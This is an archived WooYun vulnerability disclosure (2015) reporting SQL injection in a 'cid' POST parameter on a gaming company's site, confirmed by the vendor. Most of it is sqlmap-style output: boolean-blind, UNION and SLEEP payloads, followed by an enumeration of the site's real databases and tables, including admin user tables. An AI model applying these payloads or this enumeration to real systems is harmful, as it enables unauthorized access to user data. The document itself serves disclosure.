乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-13: 细节已通知厂商并且等待厂商处理中 2015-05-14: 厂商已经确认,细节仅向厂商公开 2015-05-24: 细节向核心白帽子及相关领域专家公开 2015-06-03: 细节向普通白帽子公开 2015-06-13: 细节向实习白帽子公开 2015-06-28: 细节向公众公开
不小心,捡来的
Parameter: cid (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cid=1 AND 3022=3022 Type: UNION query Title: MySQL UNION query (NULL) - 5 columns Payload: cid=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a6b7171,0x57545371584357714d6d,0x716a6a7a71),NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cid=1 AND SLEEP(5)---web application technology: Nginxback-end DBMS: MySQL 5.0.11Database: sns_album[16 tables]+---------------------------------------+| app_album_cite_acg_albuminfo || app_cite_album || app_cite_photo || apps_album_active || apps_album_activelog || apps_album_category || apps_album_category_bak || apps_album_class || apps_album_friends || apps_album_photo || apps_album_photo_bak || apps_album_theme || apps_photo_diglog || apps_rating || apps_rating_log || apps_rating_photo |+---------------------------------------+Database: sns_get_armory[1 table]+---------------------------------------+| armory_raw_data |+---------------------------------------+Database: sns_gsrank[419 tables]+---------------------------------------+| app_armory_gs || app_armory_gs_realm || app_armory_gs_realm_1 || app_armory_gs_realm_10 || app_armory_gs_realm_100 || app_armory_gs_realm_101 || app_armory_gs_realm_102 || app_armory_gs_realm_103 || app_armory_gs_realm_104 || app_armory_gs_realm_105 || app_armory_gs_realm_106 || app_armory_gs_realm_107 || app_armory_gs_realm_108 || app_armory_gs_realm_109 || app_armory_gs_realm_11 || app_armory_gs_realm_110 || app_armory_gs_realm_111 || app_armory_gs_realm_112 || app_armory_gs_realm_113 || app_armory_gs_realm_114 || app_armory_gs_realm_115 || app_armory_gs_realm_116 || app_armory_gs_realm_117 || app_armory_gs_realm_118 || app_armory_gs_realm_119 || app_armory_gs_realm_12 || app_armory_gs_realm_120 || app_armory_gs_realm_121 || app_armory_gs_realm_122 || app_armory_gs_realm_123 || app_armory_gs_realm_124 || app_armory_gs_realm_125 || app_armory_gs_realm_126 || app_armory_gs_realm_127 || app_armory_gs_realm_128 || app_armory_gs_realm_129 || app_armory_gs_realm_13 || app_armory_gs_realm_130 || app_armory_gs_realm_131 || app_armory_gs_realm_132 || app_armory_gs_realm_133 || app_armory_gs_realm_134 || app_armory_gs_realm_135 || app_armory_gs_realm_136 || app_armory_gs_realm_137 || app_armory_gs_realm_138 || app_armory_gs_realm_139 || app_armory_gs_realm_14 || app_armory_gs_realm_140 || app_armory_gs_realm_141 || app_armory_gs_realm_142 || app_armory_gs_realm_143 || app_armory_gs_realm_144 || app_armory_gs_realm_145 || app_armory_gs_realm_146 || app_armory_gs_realm_147 || app_armory_gs_realm_148 || app_armory_gs_realm_149 || app_armory_gs_realm_15 || app_armory_gs_realm_150 || app_armory_gs_realm_151 || app_armory_gs_realm_152 || app_armory_gs_realm_153 || app_armory_gs_realm_154 || app_armory_gs_realm_155 || app_armory_gs_realm_156 || app_armory_gs_realm_157 || app_armory_gs_realm_158 || app_armory_gs_realm_159 || app_armory_gs_realm_16 || app_armory_gs_realm_160 || app_armory_gs_realm_161 || app_armory_gs_realm_162 || app_armory_gs_realm_163 || app_armory_gs_realm_164 || app_armory_gs_realm_165 || app_armory_gs_realm_166 || app_armory_gs_realm_167 || app_armory_gs_realm_168 || app_armory_gs_realm_169 || app_armory_gs_realm_17 || app_armory_gs_realm_170 || app_armory_gs_realm_171 || app_armory_gs_realm_172 || app_armory_gs_realm_173 || app_armory_gs_realm_174 || app_armory_gs_realm_175 || app_armory_gs_realm_176 || app_armory_gs_realm_177 || app_armory_gs_realm_178 || app_armory_gs_realm_179 || app_armory_gs_realm_18 || app_armory_gs_realm_180 || app_armory_gs_realm_181 || app_armory_gs_realm_182 || app_armory_gs_realm_183 || app_armory_gs_realm_184 || app_armory_gs_realm_185 || app_armory_gs_realm_186 || app_armory_gs_realm_187 || app_armory_gs_realm_188 || app_armory_gs_realm_189 || app_armory_gs_realm_19 || app_armory_gs_realm_190 || app_armory_gs_realm_191 || app_armory_gs_realm_192 || app_armory_gs_realm_193 || app_armory_gs_realm_194 || app_armory_gs_realm_195 || app_armory_gs_realm_196 || app_armory_gs_realm_197 || app_armory_gs_realm_198 || app_armory_gs_realm_199 || app_armory_gs_realm_2 || app_armory_gs_realm_20 || app_armory_gs_realm_200 || app_armory_gs_realm_201 || app_armory_gs_realm_202 || app_armory_gs_realm_203 || app_armory_gs_realm_204 || app_armory_gs_realm_205 || app_armory_gs_realm_206 || app_armory_gs_realm_207 || app_armory_gs_realm_208 || app_armory_gs_realm_209 || app_armory_gs_realm_21 || app_armory_gs_realm_210 || app_armory_gs_realm_211 || app_armory_gs_realm_212 || app_armory_gs_realm_213 || app_armory_gs_realm_214 || app_armory_gs_realm_215 || app_armory_gs_realm_216 || app_armory_gs_realm_217 || app_armory_gs_realm_218 || app_armory_gs_realm_219 || app_armory_gs_realm_22 || app_armory_gs_realm_220 || app_armory_gs_realm_221 || app_armory_gs_realm_222 || app_armory_gs_realm_223 || app_armory_gs_realm_224 || app_armory_gs_realm_225 || app_armory_gs_realm_226 || app_armory_gs_realm_227 || app_armory_gs_realm_228 || app_armory_gs_realm_229 || app_armory_gs_realm_23 || app_armory_gs_realm_230 || app_armory_gs_realm_231 || app_armory_gs_realm_232 || app_armory_gs_realm_233 || app_armory_gs_realm_234 || app_armory_gs_realm_235 || app_armory_gs_realm_236 || app_armory_gs_realm_237 || app_armory_gs_realm_238 || app_armory_gs_realm_239 || app_armory_gs_realm_24 || app_armory_gs_realm_240 || app_armory_gs_realm_241 || app_armory_gs_realm_242 || app_armory_gs_realm_243 || app_armory_gs_realm_244 || app_armory_gs_realm_245 || app_armory_gs_realm_246 || app_armory_gs_realm_247 || app_armory_gs_realm_248 || app_armory_gs_realm_249 || app_armory_gs_realm_25 || app_armory_gs_realm_250 || app_armory_gs_realm_251 || app_armory_gs_realm_252 || app_armory_gs_realm_253 || app_armory_gs_realm_254 || app_armory_gs_realm_255 || app_armory_gs_realm_256 || app_armory_gs_realm_257 || app_armory_gs_realm_258 || app_armory_gs_realm_259 || app_armory_gs_realm_26 || app_armory_gs_realm_260 || app_armory_gs_realm_261 || app_armory_gs_realm_262 || app_armory_gs_realm_263 || app_armory_gs_realm_264 || app_armory_gs_realm_265 || app_armory_gs_realm_266 || app_armory_gs_realm_267 || app_armory_gs_realm_268 || app_armory_gs_realm_269 || app_armory_gs_realm_27 || app_armory_gs_realm_270 || app_armory_gs_realm_271 || app_armory_gs_realm_272 || app_armory_gs_realm_273 || app_armory_gs_realm_274 || app_armory_gs_realm_275 || app_armory_gs_realm_276 || app_armory_gs_realm_277 || app_armory_gs_realm_278 || app_armory_gs_realm_279 || app_armory_gs_realm_28 || app_armory_gs_realm_280 || app_armory_gs_realm_281 || app_armory_gs_realm_282 || app_armory_gs_realm_283 || app_armory_gs_realm_284 || app_armory_gs_realm_285 || app_armory_gs_realm_286 || app_armory_gs_realm_287 || app_armory_gs_realm_288 || app_armory_gs_realm_289 || app_armory_gs_realm_29 || app_armory_gs_realm_290 || app_armory_gs_realm_291 || app_armory_gs_realm_292 || app_armory_gs_realm_293 || app_armory_gs_realm_294 || app_armory_gs_realm_295 || app_armory_gs_realm_296 || app_armory_gs_realm_297 || app_armory_gs_realm_298 || app_armory_gs_realm_299 || app_armory_gs_realm_3 || app_armory_gs_realm_30 || app_armory_gs_realm_300 || app_armory_gs_realm_301 || app_armory_gs_realm_302 || app_armory_gs_realm_303 || app_armory_gs_realm_304 || app_armory_gs_realm_305 || app_armory_gs_realm_306 || app_armory_gs_realm_307 || app_armory_gs_realm_308 || app_armory_gs_realm_309 || app_armory_gs_realm_31 || app_armory_gs_realm_310 || app_armory_gs_realm_311 || app_armory_gs_realm_312 || app_armory_gs_realm_313 || app_armory_gs_realm_314 || app_armory_gs_realm_315 || app_armory_gs_realm_316 || app_armory_gs_realm_317 || app_armory_gs_realm_318 || app_armory_gs_realm_319 || app_armory_gs_realm_32 || app_armory_gs_realm_320 || app_armory_gs_realm_321 || app_armory_gs_realm_322 || app_armory_gs_realm_323 || app_armory_gs_realm_324 || app_armory_gs_realm_325 || app_armory_gs_realm_326 || app_armory_gs_realm_327 || app_armory_gs_realm_328 || app_armory_gs_realm_329 || app_armory_gs_realm_33 || app_armory_gs_realm_330 || app_armory_gs_realm_331 || app_armory_gs_realm_332 || app_armory_gs_realm_333 || app_armory_gs_realm_334 || app_armory_gs_realm_335 || app_armory_gs_realm_336 || app_armory_gs_realm_337 || app_armory_gs_realm_338 || app_armory_gs_realm_339 || app_armory_gs_realm_34 || app_armory_gs_realm_340 || app_armory_gs_realm_341 || app_armory_gs_realm_342 || app_armory_gs_realm_343 || app_armory_gs_realm_344 || app_armory_gs_realm_345 || app_armory_gs_realm_346 || app_armory_gs_realm_347 || app_armory_gs_realm_348 || app_armory_gs_realm_349 || app_armory_gs_realm_35 || app_armory_gs_realm_350 || app_armory_gs_realm_351 || app_armory_gs_realm_352 || app_armory_gs_realm_353 || app_armory_gs_realm_354 || app_armory_gs_realm_355 || app_armory_gs_realm_356 || app_armory_gs_realm_357 || app_armory_gs_realm_358 || app_armory_gs_realm_359 || app_armory_gs_realm_36 || app_armory_gs_realm_360 || app_armory_gs_realm_361 || app_armory_gs_realm_362 || app_armory_gs_realm_363 || app_armory_gs_realm_364 || app_armory_gs_realm_365 || app_armory_gs_realm_366 || app_armory_gs_realm_367 || app_armory_gs_realm_368 || app_armory_gs_realm_369 || app_armory_gs_realm_37 || app_armory_gs_realm_370 || app_armory_gs_realm_371 || app_armory_gs_realm_372 || app_armory_gs_realm_373 || app_armory_gs_realm_374 || app_armory_gs_realm_375 || app_armory_gs_realm_376 || app_armory_gs_realm_377 || app_armory_gs_realm_378 || app_armory_gs_realm_379 || app_armory_gs_realm_38 || app_armory_gs_realm_380 || app_armory_gs_realm_381 || app_armory_gs_realm_382 || app_armory_gs_realm_383 || app_armory_gs_realm_384 || app_armory_gs_realm_385 || app_armory_gs_realm_386 || app_armory_gs_realm_387 || app_armory_gs_realm_388 || app_armory_gs_realm_389 || app_armory_gs_realm_39 || app_armory_gs_realm_390 || app_armory_gs_realm_391 || app_armory_gs_realm_392 || app_armory_gs_realm_393 || app_armory_gs_realm_394 || app_armory_gs_realm_395 || app_armory_gs_realm_396 || app_armory_gs_realm_397 || app_armory_gs_realm_398 || app_armory_gs_realm_399 || app_armory_gs_realm_4 || app_armory_gs_realm_40 || app_armory_gs_realm_400 || app_armory_gs_realm_401 || app_armory_gs_realm_402 || app_armory_gs_realm_403 || app_armory_gs_realm_404 || app_armory_gs_realm_405 || app_armory_gs_realm_406 || app_armory_gs_realm_407 || app_armory_gs_realm_408 || app_armory_gs_realm_409 || app_armory_gs_realm_41 || app_armory_gs_realm_410 || app_armory_gs_realm_411 || app_armory_gs_realm_412 || app_armory_gs_realm_413 || app_armory_gs_realm_414 || app_armory_gs_realm_42 || app_armory_gs_realm_43 || app_armory_gs_realm_44 || app_armory_gs_realm_45 || app_armory_gs_realm_46 || app_armory_gs_realm_47 || app_armory_gs_realm_48 || app_armory_gs_realm_49 || app_armory_gs_realm_5 || app_armory_gs_realm_50 || app_armory_gs_realm_51 || app_armory_gs_realm_52 || app_armory_gs_realm_53 || app_armory_gs_realm_54 || app_armory_gs_realm_55 || app_armory_gs_realm_56 || app_armory_gs_realm_57 || app_armory_gs_realm_58 || app_armory_gs_realm_59 || app_armory_gs_realm_6 || app_armory_gs_realm_60 || app_armory_gs_realm_61 || app_armory_gs_realm_62 || app_armory_gs_realm_63 || app_armory_gs_realm_64 || app_armory_gs_realm_65 || app_armory_gs_realm_66 || app_armory_gs_realm_67 || app_armory_gs_realm_68 || app_armory_gs_realm_69 || app_armory_gs_realm_7 || app_armory_gs_realm_70 || app_armory_gs_realm_71 || app_armory_gs_realm_72 || app_armory_gs_realm_73 || app_armory_gs_realm_74 || app_armory_gs_realm_75 || app_armory_gs_realm_76 || app_armory_gs_realm_77 || app_armory_gs_realm_78 || app_armory_gs_realm_79 || app_armory_gs_realm_8 || app_armory_gs_realm_80 || app_armory_gs_realm_81 || app_armory_gs_realm_82 || app_armory_gs_realm_83 || app_armory_gs_realm_84 || app_armory_gs_realm_85 || app_armory_gs_realm_86 || app_armory_gs_realm_87 || app_armory_gs_realm_88 || app_armory_gs_realm_89 || app_armory_gs_realm_9 || app_armory_gs_realm_90 || app_armory_gs_realm_91 || app_armory_gs_realm_92 || app_armory_gs_realm_93 || app_armory_gs_realm_94 || app_armory_gs_realm_95 || app_armory_gs_realm_96 || app_armory_gs_realm_97 || app_armory_gs_realm_98 || app_armory_gs_realm_99 || app_armory_gs_realm_guild || app_armory_gs_region_cn || app_armory_gs_region_tw |+---------------------------------------+Database: sns_cite[19 tables]+---------------------------------------+| app_cite_bad_words || app_cite_badword || app_cite_black_list || app_cite_essential || app_cite_essential_index || app_cite_essential_list || app_cite_fuzzy_words || app_cite_list || app_cite_logs || app_cite_resource || app_cite_syslist || app_cite_sysres || app_cite_taglist || app_cite_taglist_tmp || app_cite_tags || app_cite_vote_log || app_cite_vote_words || app_cite_votes || app_cite_weibo_static |+---------------------------------------+Database: sns_blog[4 tables]+---------------------------------------+| apps_blog_category || apps_blog_last || apps_blog_thread || apps_blog_visit |+---------------------------------------+Database: test[1 table]+---------------------------------------+| t |+---------------------------------------+Database: game[20 tables]+---------------------------------------+| area || carriers || charecteristic || charge || developers || game_badge || game_badge_user || game_data || game_data_bak || game_day_statics || game_info || game_month_statics || game_op_log || game_type || game_user_game || game_week_log || game_week_statics || ku_game || picture_type || test_state |+---------------------------------------+Database: sns_group[6 tables]+---------------------------------------+| app_group || app_group_visitor || app_thread || app_thread_comment || app_thread_member || app_thread_my |+---------------------------------------+Database: sns2[218 tables]+---------------------------------------+| animation_subscribe || animations || annual || app_active || app_active_contact || app_active_hero || app_active_user || app_armory || app_armory_accept_log || app_armory_approve || app_armory_chang_fail || app_armory_cn_enchantment || app_armory_cn_gem || app_armory_ctm || app_armory_ctm_event_log || app_armory_data_0 || app_armory_data_1 || app_armory_data_2 || app_armory_data_3 || app_armory_data_4 || app_armory_data_5 || app_armory_data_6 || app_armory_data_8 || app_armory_data_9 || app_armory_event_info || app_armory_get_fail_ || app_armory_item || app_armory_item_ || app_armory_item_glyphs || app_armory_new_user || app_armory_queue || app_armory_relation || app_armory_snapshot || app_armory_tongji || app_armory_tw_gem || app_armory_visit_num || app_armroy_event_gift_user || app_armroy_event_user_address || app_attention || app_attention_group || app_attention_group_relate || app_attention_remark || app_attention_request || app_attentions || app_attentions_old || app_avatar_log || app_badusers || app_bind || app_bind_logs || app_bind_note || app_bind_server || app_buff_list || app_buff_log || app_buff_skills || app_buff_user || app_cite_list || app_cite_log || app_cite_ngalist || app_cite_poll_key || app_cite_poll_log || app_cite_resourse || app_cite_taglist || app_cite_taglist_tmp || app_cite_tags || app_com_mycomment || app_com_post || app_com_recive || app_com_resources || app_com_state || app_com_thread || app_dh_viewlog || app_duel_player || app_ext_extcredit || app_ext_info || app_favorite_category || app_favorite_item || app_favorite_items || app_favorite_owners || app_favorite_relations || app_favorite_tags || app_feed || app_feed_relation_0 || app_feed_relation_1 || app_feed_relation_2 || app_feed_relation_3 || app_feed_relation_4 || app_feed_relation_5 || app_feed_relation_6 || app_feed_relation_7 || app_feed_relation_8 || app_feed_relation_9 || app_footprint || app_friends_invitation || app_game_info || app_game_my_info || app_game_my_info_bak20120405 || app_game_my_info_bak20120409 || app_game_my_info_data || app_game_my_info_list || app_game_my_type || app_game_type || app_gift_list || app_gift_log || app_gift_transfer_card || app_gift_transfer_card_uselog || app_gift_transfer_focus || app_gift_transfer_item || app_gift_transfer_item_bak11 || app_gift_transfer_lottery_log || app_gift_transfer_reward || app_gift_transfer_reward_center || app_gift_transfer_route_0 || app_gift_transfer_user_lastone || app_gift_transfer_user_log || app_guild_invite || app_guild_invite_log || app_imhot || app_login_statistics || app_medal || app_medal_user || app_mh_viewlog || app_notify_log || app_poll_body || app_poll_key || app_poll_key_log || app_poll_subject_log || app_presti || app_presti_acg_name || app_quest || app_quest_brick_log || app_quest_categories || app_quest_daily_log || app_quest_dare_deathlog || app_quest_dare_log || app_quest_done_log || app_quest_extend || app_quest_forum || app_quest_log || app_quest_record || app_quest_statistic || app_res_dh || app_res_dh_chapter || app_res_mh || app_res_mh_chapter || app_res_xs || app_res_xs_chapter || app_reward || app_reward_log || app_reward_record || app_rss || app_sms_announcement || app_sms_announcement_log || app_sms_citenotice || app_sms_count || app_sms_daily_record || app_sms_delete_log || app_sms_ms || app_sms_notice || app_sms_notice_0 || app_sms_notice_1 || app_sms_notice_2 || app_sms_notice_3 || app_sms_notice_4 || app_sms_notice_5 || app_sms_notice_6 || app_sms_notice_7 || app_sms_notice_8 || app_sms_notice_9 || app_sms_notice_reciever || app_sms_reciever || app_sms_session || app_sms_statistic || app_tags || app_tags_relation || app_talent || app_talent_action || app_talent_res || app_talent_script || app_user_template || app_view_log || app_view_statics || app_wb_quest || app_wish || app_wish_action || app_wish_god || app_wish_god_response || app_wish_item_rank || app_wish_user || app_xs_viewlog || apps_album_category || apps_album_photo || apps_blog_category || apps_blog_thread || apps_blog_visit || armory_queue || bad_sms_session || cartoon_subscribe || comics || dkp_cancel_subscribe || dkp_subscribe || fiction_subscribe || level_exp_bak || master_slave_test || operate_log || operate_log_statistics || prop_online || prop_standard || prop_standard2 || prop_standard_close || quest_visit_log || resource_rating || sms_subscribe_list_data || sms_subscribe_pinyin_data || test || tmp_reward_log || tmp_reword || tmp_sms_ids || user_game_bind |+---------------------------------------+Database: sns_api[10 tables]+---------------------------------------+| app_activation_code || app_activation_code_stat || sns_api_count || sns_api_log || sns_api_log_178 || sns_api_log_slow || sns_api_nga_log || sns_app || sns_profile || sns_user_app |+---------------------------------------+Database: sns_admin[9 tables]+---------------------------------------+| _resources || _roles || _sessions || _users || operate_log || operate_log_statistics || priv_roles || priv_users || user_roles |+---------------------------------------+Database: sns_bet[34 tables]+---------------------------------------+| app_bet_games || app_bet_gift_list || app_bet_list || app_bet_maps || app_bet_match_rich_5 || app_bet_match_rich_6 || app_bet_match_rich_7 || app_bet_matchs || app_bet_player_log || app_bet_playerdata || app_bet_profit_list || app_bet_races || app_bet_roll_apps || app_bet_seasions || app_bet_user_chipin_log || app_bet_user_gift_log || app_bet_user_info || app_bet_user_riches_20101128 || app_bet_user_riches_20101205 || app_bet_user_riches_20101205_bak || app_bet_user_riches_20101212 || app_bet_user_riches_20101220 || app_bet_user_riches_20110107 || app_bet_user_riches_20110114 || app_bet_user_riches_20110121 || app_bet_user_riches_20110128 || app_bet_user_riches_20110204 || app_bet_user_riches_20110221 || app_bet_user_riches_20110320 || app_bet_user_riches_20110418 || app_bet_user_riches_20110515 || app_bet_user_riches_20110612 || app_bet_user_riches_20110714 || app_bet_user_well |+---------------------------------------+
intval
危害等级:高
漏洞Rank:15
确认时间:2015-05-14 11:02
确实比较隐蔽,感谢洞主对完美世界的关注,我们将尽快修补漏洞,谢谢!
暂无
